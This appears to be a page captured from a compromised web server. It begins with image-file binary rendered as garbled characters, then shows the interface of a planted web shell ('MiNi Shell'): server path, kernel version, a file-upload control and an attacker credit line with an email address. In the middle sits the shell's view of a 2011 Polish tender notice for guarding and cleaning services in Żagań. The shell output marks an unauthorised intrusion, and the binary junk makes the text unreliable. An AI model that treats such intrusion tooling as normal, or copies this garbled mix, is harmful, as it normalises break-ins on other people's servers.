JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110601/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110601/139276-N-2011.html

<p class="kh_header"><b>Żagań: Świadczenie usług w zakresie ochrony osób i mienia oraz  usługi sprzątania  w obiektach Miejskiego Przedsiębiorstwa Oczyszczania i Robót Drogowych sp. z o.o. w Żaganiu w latach 2011-2013</b><br>
<b>Numer ogłoszenia: 139276 - 2011; data zamieszczenia: 01.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Przedsiębiorstwo Oczyszczania i Robót Drogowych Sp. z o.o. , ul. Nowogródzka 2, 68-100 Żagań, woj. lubuskie, tel. 068 4773729, faks 068 4774858.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mpoird.zagan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka z ograniczoną odpowiedzialnością.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie ochrony osób i mienia oraz  usługi sprzątania  w obiektach Miejskiego Przedsiębiorstwa Oczyszczania i Robót Drogowych sp. z o.o. w Żaganiu w latach 2011-2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.2.Zakres usługi w szczególności obejmuje: 
 3.2.1 w zakresie ochrony osób i mienia a) ochronę pomieszczeń znajdujących się w budynkach i na placach przed dostępem osób nieuprawnionych b) ochronę mienia  znajdującego się w budynkach i na placach przed kradzieżą, zniszczeniem lub uszkodzeniem c) sprawdzanie stanu zabezpieczeń pomieszczeń d) współdziałanie z Policą i Strażą Pożarną e) interwencje w przypadkach zaistnienia zagrożenia bezpieczeństwa osób lub mienia:f) rejestrowanie wyjazdów i przyjazdów pojazdów MPOiRD sp. z o.o. g) rejestrowanie wejść, wyjść pracowników MPOiRD sp. z o.o. po godzinach pracy tj.pomiędzy godziną 15:00 - 7:00 w tym również kontrola uprawnień pracowników do przebywania w obiektach poza godzinami pracy h) informowanie Zarząd Spółki lub osoby wyznaczone przez Zarząd o zaistniałych zdarzeniach mający charakter losowy;i)pełnienie służby w obowiązującym, kompletnym umundurowaniu z identyfikatorem j) zachowanie w tajemnicy wszystkich informacji, które mogą mieć wpływ na stan zabezpieczenia obiektów w trakcie trwania umowy po jej wygaśnięciu k) konserwacja urządzeń systemu monitoringu - jeden raz na kwartał l) stałego nadzorowania systemu monitoringu oraz podejmowania interwencji i odpowiednie postępowanie po odebraniu sygnału alarmowego ł) kontrola pracowników ochrony wykonywana przez licencjonowanego Szefa Ochrony, co najmniej dwa razy w tygodniu dokumentowana Zamawiającemu 3.2.2.W zakresie sprzątania obiektów:   
a) zamiatanie i mycie twardych powierzchni posadzek we wszystkich pomieszczeniach przewidzianych do sprzątania
b) mycie i dezynfekcja sanitariatów
c) mycie lamperii na korytarzach i w  pomieszczeniach sanitarnych
d) wycieranie kurzu z powierzchni zewnętrznych: mebli biurowych, szaf, półek, krzeseł, stołów
e) opróżnianie i wymiana wkładów foliowych oraz mycie koszy i popielniczek 
f) mycie drzwi wejściowych i wewnętrznych
g) wycieranie parapetów i kaloryferów
h) przecieranie wyposażenia biur ( telefony, czajniki, radia, tacki, podkładki itp.)
i)mycie okien w biurowcu i w pozostałych pomieszczeniach
j) przecieranie powierzchni oszklonych
k) podlewanie kwiatów
l)wykonywanie innych prac zleconych przez Zamawiającego.
Sprzątanie pomieszczeń biurowych i socjalnych o łącznej powierzchni 280m2 oraz   mycie okien w tych pomieszczeniach ( biurowych co dwa miesiące około 40 m2 , socjalnych raz na kwartał około 42 m2).
Środki czystości do wykonania tej usługi zapewnia wykonawca.
3.3 Obiekty mienia są ogrodzone i oświetlone. Służba ochronna winna być pełniona w następujący sposób:w dni powszechne od godziny 14:30 - 7:30 w miejscowości Chrobrów składowisko odpadów komunalnych w dni powszechne od godziny 15:00 - 7:00 w miejscowości Żagań  siedziba zamawiającego - w dni świąteczne oraz wolne od pracy - całodobowo 
3.4 Zamawiający wymaga aby Wykonawca zabezpieczył odpowiednią ilość pracowników do wykonania usługi w systemie zmianowym posiadających niezbędne przygotowanie zawodowe, znających ogólne zasady udzielania pierwszej pomocy sanitarnej oraz sprawowania profilaktyki p. poż.
3.5. Wykonawca zapewni na własny koszt niezbędne środki do wykonania usługi przez jego pracowników takie jak: środki ochrony osobistej, ubrania robocze oraz umundurowanie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.71.40.00-2, 90.91.12.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące : 
1) posiadania uprawnień  do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa  nakładają obowiązek ich posiadania;           
2) posiadania  wiedzy i doświadczenia; 
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;	 
   4) sytuacji ekonomicznej i finansowej; 
5.2.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia /np. w formie 
      Konsorcjum/.
5.3.W przypadku wspólnego ubiegania się, Wykonawcy ustanawiają pełnomocnika   
      do reprezentowania ich w postępowaniu o udzielenie  zamówienia publicznego  
      albo do reprezentowania w postępowaniu i zawarcia  umowy w  sprawie 
      zamówienia publicznego. Na potwierdzenie ustanowienia pełnomocnika 
      Wykonawcy załączają do oferty stosowne pełnomocnictwo.  
5.4.Jeżeli oferta Wykonawców ubiegających się wspólnie o udzielenie zamówienia, 
      zostanie wybrana, Zamawiający żąda przed zawarciem umowy w sprawie 
      zamówienia publicznego, umowy regulującej współpracę tych  Wykonawców.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)w  zakresie  posiadania  przez Wykonawcę uprawnień do wykonywania określonej działalności lub czynność, Zamawiający żąda od Wykonawcy potwierdzenia posiadania uprawnień do wykonywania działalności, gdyż przepisy prawa nakładają  obowiązek posiadania takowych uprawnień; Wykonawca winien posiadać aktualną koncesję na cały okres przewidziany dla zadania na ochronę mienia i osób zgodnie z ustawą o ochronie osób i mienia  z dnia 22 sierpnia 1997 / Dz. U z 2005r, Nr 145, poz. 1221 z późn.zm 2) w zakresie  posiadania wiedzy i doświadczenia Zamawiający uzna za spełniającego ten wymóg  Wykonawcę,  który w okresie ostatnich trzech lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie,  wykonał co najmniej: 2 usługi odpowiadające przedmiotowi zamówienia ( każda z nich powinna trwać nieprzerwanie przez okres co najmniej 6 miesięcy) polegającej na ochronie mienia i osób 2 usługi odpowiadające przedmiotowi zamówienia  ( każda  z nich powinna trwać nieprzerwanie przez okres co najmniej 6 miesięcy) polegającej na sprzątaniu biur Na potwierdzenie spełnienia  tego warunku Wykonawca złoży wraz z ofertą dokument  określony w punkcie 6.1 podpunkt 2 Specyfikacji Istotnych Warunków Zamówienia wraz z załączonymi  do niego dokumentami potwierdzającymi, że usługi  te zostały wykonane należycie.
Wykonawcy występujący wspólnie o udzielenie zamówienia publicznego mogą 
spełnić powyższy warunek łącznie.Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów,niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami  niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, Zamawiający uzna za spełniającego te wymogi tego Wykonawcę, który będzie dysponował osobami posiadającymi niezbędne doświadczenie zawodowe, znających ogólne zasady udzielania pierwszej pomocy sanitarnej oraz sprawowania profilaktyki p.poż.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie pełnienia tego warunku Wykonawca złoży wraz z  ofertą  dokument określony w  punkcie 6.1 podpunkt 3 SIWZ. Wykonawcy występujący wspólnie powyższy warunek mogą spełnić łącznie. W zakresie dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca może polegać na  potencjale technicznym innych podmiotów,  niezależnie od charakteru  prawnego łączących go z nimi stosunków.  Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował  zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów  do  oddania mu do dyspozycji  niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, oraz składając dokumenty  określone w punkcie 6.1 podpunkt 4 SIWZ.;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie sytuacji ekonomicznej i finansowej, Zamawiający uzna za spełniającego te wymogi tego Wykonawcę, który  będzie ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  gospodarczej związanej z przedmiotem zamówienia i na potwierdzenie spełnienia tego warunku złoży wraz z ofertą  dokument określony w  punkcie 6.1 podpunkt 5 Specyfikacji Istotnych Warunków Zamówienia. Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>16.6.Zamawiający - na podstawie art.144 ust.1 i 2 Ustawy Prawo zamówień 
        publicznych nie dopuszcza możliwość zmian postanowień zawartej umowy w 
        stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy: 
16.7.W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie    
        umowy nie leży w interesie publicznym, czego nie można było przewidzieć w 
        chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 
        dni od powzięcia wiadomości o tych okolicznościach. W tym przypadku 
        Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu 
        wykonania części umowy.
16.8.Obowiązującą formą odszkodowania będą kary umowne określone w projekcie 
        umowy. 
16.9.Strony zastrzegają sobie prawo dochodzenia odszkodowania uzupełniającego  
        do wysokości rzeczywiście poniesionej szkody.
16.10.Zamawiający nie przewiduje możliwości udzielenia zaliczek na poczet 
         wykonania zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mpoird.zagan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba Miejskiego Przedsiębiorstwa Oczyszczania i Robót Drogowych sp. z o.o. ul. Nowogródzka 2 68-100 Żagań, Sekretariat pokój nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.06.2011 godzina 09:00, miejsce: siedziba Miejskiego Przedsiębiorstwa Oczyszczania i Robót Drogowych sp. z o.o. ul. Nowogródzka 2 68-100 Żagań, Sekretariat pokój nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com